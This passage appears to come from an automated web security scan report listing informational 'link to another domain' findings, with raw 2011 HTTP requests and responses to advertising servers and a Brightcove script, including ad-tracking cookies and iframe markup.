GET /iframe3?XKUDAHCNIABqIpUAAAAAAArpJQAAAAAAAAAMAIAAAAAAAA0AAQADCJ6uAQAAAAAAKasxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAIBYzSd4lD8AAMR19m7APwAAAAAAAAAAAADEdfZuwD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTzbx8WfquCrkAQGF3mkTKtl2.WiYSu9rp2McYAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15q6ggjle%2FM%3D787833.14800347.14555521.14177427%2FD%3Dsports%2FS%3D25664825%3AMREC%2F_ylt%3DAjV6qkbscsOrHRx5YKOYi005nYcB%2FY%3DYAHOO%2FEXP%3D1315320305%2FL%3Dcopx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z%2FB%3DY_rxAdBDRyg-%2FJ%3D1315313105713897%2FK%3Dr8awXcUkJHjbbi3QZybcoQ%2FA%3D6454134%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26S%3D14800347%26Z%3D300x100%26_PVID%3Dcopx%255fWKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL%255fz%26_salt%3D678154096%26cb%3D1315313105713897%26i%3D140509%26r%3D0%26ycg%3D%26yyob%3D%26zip%3D,10a407f8-d886-11e0-8bc2-78e7d15f4cd0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=copx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z&ad_type=iframe&ad_size=300x100&site=140509&section_code=14800347&cb=1315313105713897&zip=&ycg=&yyob=&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15q6ggjle/M=787833.14800347.14555521.14177427/D=sports/S=25664825:MREC/_ylt=AjV6qkbscsOrHRx5YKOYi005nYcB/Y=YAHOO/EXP=1315320305/L=copx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z/B=Y_rxAdBDRyg-/J=1315313105713897/K=r8awXcUkJHjbbi3QZybcoQ/A=6454134/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; ih="b!!!!,!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8_!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!4A]Y!!!!#=3f8q!4ZV5!!!!#=3f8^"; vuday1=BKZI(BgvR+4M6Eq!79C8LO3Y0; liday1=fh'jT*YKlx8SkUq!79C8<4H$c; bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!#=3f8^!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:24 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0077.rm.sp2
Set-Cookie: ih="b!!!!'!1-_1!!!!#=3f9$!2reF!!!!#=3f9'!4!0X!!!!#=3f9!!4A]T!!!!#=3f9#"; path=/; expires=Thu, 05-Sep-2013 12:45:24 GMT
Set-Cookie: vuday1=BgvR)!79C8gzv0u; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!#!!qrZ!!E)(!%L:B!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f9'=3p6,M.jTN"; path=/; expires=Thu, 05-Sep-2013 12:45:24 GMT
Set-Cookie: uid=uid=16caae16-d886-11e0-a615-78e7d15fc798&_hmacv=1&_salt=1081018325&_keyid=k1&_hmac=6089ab2e1c3124fdec5c84659be94e61053c31b3; path=/; expires=Thu, 06-Oct-2011 12:45:24 GMT
Set-Cookie: lifb=0EA2)D0!)KJ4EWf; path=/; expires=Fri, 09-Sep-2011 12:45:24 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:45:24 GMT
Pragma: no-cache
Content-Length: 1002
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9773674);}
</script><iframe src="http://view.atdmt.com/TR1/iview/332867993/direct/01?time=1315313124&click=http://ads.bluelithium.com/clk?3,eAGlkEuPokAUhf.MrCYO9abKJrUoBFteKjZ2S28MD1sbcECgo86vHzKOZvZzNudLbu65uQcR44NkNMPiAwuEeEqwgQgmu4wJvOMjaBgGRmKMEeNwPNp4a0vNJnNHmSenWaub2sYN.6JSgXLuDJUKlTVx9a.B.8hLust9-n9u5e7j0HBwf0tj1J8uC8d8ZFv2OY7C8xzH1H8L6cKK-yCaVsEE0vgYXP0oo-9RXgbR63H-PC-Dx6KSo0PfN08A7Ks6TSotaXPtmhzqWsvqI3hxniViJ32.L6odCCQXXBCiISogJJQPwAZhNADinGIOLNk1ddt34EViputUYPYUrOwJ2F6rXqriVT-VaZd1i3a2urDYW8SfELKfcWaCWMZqtlgAe7OUiCBGMCSQAV9mdXPZvnnO0uaNWjVFVGnnInRFcMh5UrLjNLfVxN.-AqaMt-1F5aa1uu5.APcWM2RBxhERYw482YrkvMnWpTsr0vSThO.XNKtDoKROGUWEgpWE4Pu3ey23b.6p5De7gqfh," frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="100"></iframe>
...[SNIP]...

15.41. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /iframe3?M0EnBfsYGQDMqpkAAAAAAH7vJQAAAAAAAgAAAAIAAAAAAP8AAAADCF2yCAAAAAAAF7MxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByawMAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAMDEXZPBPwAAAAAAAAAAAADAxF2T0T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADyM7pcvfauCpvklJWDGZaJ844CyDZSBbQYVKfLAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15sa69po3%2FM%3D787833.14486084.14323910.12559432%2FD%3Dallmyfr%2FS%3D360632246%3ALREC%2FY%3DYAHOO%2FEXP%3D1315319387%2FL%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%2FB%3DejW9Ptj8el8-%2FJ%3D1315312187399365%2FK%3Dnql_VTEk0rLg6_ewKQ00GQ%2FA%3D6284639%2FR%3D0%2F%2A%24,http%3A%2F%2Ffrontier.my.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14486084%26Z%3D300x250%26_PVID%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%26_salt%3D1505089003%26cb%3D1315312187399365%26i%3D224114%26r%3D0,e974813c-d883-11e0-9781-78e7d15f7c8c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=rUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7&ad_type=iframe&ad_size=300x250&site=224114&section_code=14486084&cb=1315312187399365&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15sa69po3/M=787833.14486084.14323910.12559432/D=allmyfr/S=360632246:LREC/Y=YAHOO/EXP=1315319387/L=rUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7/B=ejW9Ptj8el8-/J=1315312187399365/K=nql_VTEk0rLg6_ewKQ00GQ/A=6284639/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!(!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE"; bh="b!!!#C!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:49 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0013.rm.sp2
Set-Cookie: ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!$=3f.'"; path=/; expires=Thu, 05-Sep-2013 12:29:49 GMT
Set-Cookie: vuday1=4M6Eq4M6Eq!79C88CF`W; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=*YKly!79C86nkxc; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:29:49 GMT
Pragma: no-cache
Content-Length: 996
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10070732);}
</script><IFRAME SRC="http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ads.bluelithium.com/clk?3,eAGlUMtyqkAQ.Zm7umWYGWaYR6hZjIjEhFExGGM2KQyI4SEEKQ35-kuiN5V9etHnnK7u09WNsB1bdAP7hGPKk2Qb2QibONkwgng8gLZtU2GaBFuEDzR098PtYe0FI.1W5-orbtjxNjhTlX7i5Czm.BNHztjsnHNFjZl-v9BfwrCLTvri0e.72qtUtvTwPJsMv829pTX9CIgOp5m.CshspFsdjgvtwL6evvvhC3kK41yHD-XU1GR9-p6Ug13b1tcApEW1iQojamKji3ZVZbxUJbifeBJZh4iKusJAS8YZx9hAhHAKOelJ.0OBoIFMyxK9ACMZFUXZbRtwLzGFFPc.pdf-wnXAWq7VzWwG3Me5RBhZGAnMGfBls3RSJTKeHB9rtaizsDBOWZBrvYtZlFulmx2Uel0xMJRJthLztm8t-BW4vdiYiDMsBKYWuJP7t-L5IXRz2PgpfU5OdwGEXgCUpCYnFAuwkBD8.fP.7G1T7dvXpDHK7sfd.wDSGZ6s,;ord=1315312189?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'></iframe>
...[SNIP]...

15.42. http://admin.brightcove.com/js/BrightcoveExperiences_all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin.brightcove.com
Path:   /js/BrightcoveExperiences_all.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /js/BrightcoveExperiences_all.js?_=1315331549705 HTTP/1.1
Host: admin.brightcove.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/residential/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "d52c6bad72ca07cc18f5abe52bb678ce:1312344056"
Last-Modified: Wed, 03 Aug 2011 04:00:54 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 101745
Cache-Control: max-age=1200
Date: Tue, 06 Sep 2011 12:52:29 GMT
Connection: close


if(brightcove==undefined){var brightcove={};brightcove.getExperience=function(){alert("Please import APIModules_all.js in order to use the API.");};}
if(brightcove.experiences==undefined){brightcove.
...[SNIP]...
th-1)=="%"){container.style.display='block';}else{container.style.display='inline-block';}
container.id=containerID;var cdnURL=secureConnections?brightcove.secureCDNURL:brightcove.cdnURL;var linkHTML="<a href='http://www.adobe.com/go/getflash/' target='_blank'><img src='"+cdnURL+"/viewer/upgrade_flash_player2.gif' alt='Get Flash Player' width='314' height='200' border='0'>
...[SNIP]...

15.43. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_798137&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=826091&rcu=http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/* HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313287575_68349120_as3107_imp|305#1315313287575_68349120_as3107_imp|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1315313297486_68372787_as3103_imp|305#1315313297486_68372787_as3103_imp|374#1315258459362_65704651_as3105_imp|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:17 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:17 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:16 GMT
Content-Length: 2560

<!DOCTYPE html>
<!-- Impression Id: 1315313297486_68372787_as3103_imp -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>

...[SNIP]...
<div id="tera-1315313297486_68372787_as3103_imp" class="tera-ad">
<a class="inner" href="http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0JStH5SrYW2GFmLxOgJisqJEI-GI6dKEEl37ImqBl26cHh8JL733uPrd6pnO80-xLq4y2RBa3ajRZdG-waEIJG5AzZm7z58SE1kUqiZ9u4aazN6S8huPlkgAKOQBClWLvtztAIBBtQDqgHxOcmF8dfJBCS07Ixyaf0vDMqQFNLIYR4JkIb08O7TjilE-5XqXJfYT_OtlH4pj4PzpW1SqRYEsG4ADAeXU43tr0DJkpvScMJkd-UY8lzXvyRKSySibu_8tV1rg10nEdA0yIaELDsAxme8Jdgl393pmO0tBP-y3c5rv5bTJcclp-Xe1xi2zbERRAY6oWDDsnVnNG7uP6lyLdNoAQAA" title="Click to find out more." target="_blank">&nbsp;</a>
...[SNIP]...

15.44. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_165052&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=147582&rcu=http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/* HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313083608_171477072_ap3104_int|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1315313287862_68296079_as3105_imp|305#1315313287862_68296079_as3105_imp|374#1315258459362_65704651_as3105_imp|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:07 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:07 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:07 GMT
Content-Length: 2563

<!DOCTYPE html>
<!-- Impression Id: 1315313287862_68296079_as3105_imp -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>

...[SNIP]...
<div id="tera-1315313287862_68296079_as3105_imp" class="tera-ad">
